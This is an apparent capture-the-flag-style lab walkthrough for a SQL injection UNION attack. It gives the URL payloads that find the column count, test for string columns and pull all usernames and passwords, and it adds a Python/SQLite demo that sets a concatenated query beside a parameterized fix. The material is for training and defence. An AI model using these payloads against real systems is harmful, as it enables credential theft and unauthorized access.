Difficulty: Practitioner
Goal
The database contains a new table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Solution
First we need to know how many columns are returned by the query:
<website>/filter?category=Pets' UNION SELECT NULL-- # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL-- # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL-- # error!
We now know there are 2 columns. Time to test if both contain string data:
<website>/filter?category=Pets' UNION SELECT 'abc',NULL-- # works
<website>/filter?category=Pets' UNION SELECT 'abc','abc'-- # works
We are now sure both columns accept string data. We can try to extract the data from the users table:
<website>/filter?category=Pets' UNION SELECT username, password FROM users--
The usernames and passwords are displayed.
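Why the steps above behave as they do, and what stops them, shown as an added example that is not part of the original write-up or of the lab's code. The products table layout, the sample rows and the function names are assumptions; the lab's real back end is not shown on the page, and SQLite stands in for it here.

```python
import sqlite3

def make_db():
    """Constructed in-memory database: a products table plus the users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Dog bed', 'Soft and washable', 'Pets');
        INSERT INTO products VALUES ('Kettle', 'Boils water', 'Kitchen');
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
        INSERT INTO users VALUES ('wiener', 'constructed-pass');
    """)
    return db

def filter_vulnerable(db, category):
    # Hypothetical 'before': the category value is concatenated into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT name, description FROM products WHERE category = '" + category + "'"
    return db.execute(sql).fetchall()

def filter_parameterized(db, category):
    # 'After': the value is bound as data, so the statement text never changes.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def column_count_mismatch(db, category):
    """True when the engine rejects the UNION because the column counts differ."""
    try:
        filter_vulnerable(db, category)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    payload = "Pets' UNION SELECT username, password FROM users--"
    # Concatenated query: product rows plus every row of users.
    print(filter_vulnerable(db, payload))
    # Bound parameter: the whole payload is compared as a category name, no rows.
    print(filter_parameterized(db, payload))
```

The error/works pattern in the first step comes from the rule that both sides of a UNION must return the same number of columns, which `column_count_mismatch` reproduces against the two-column query.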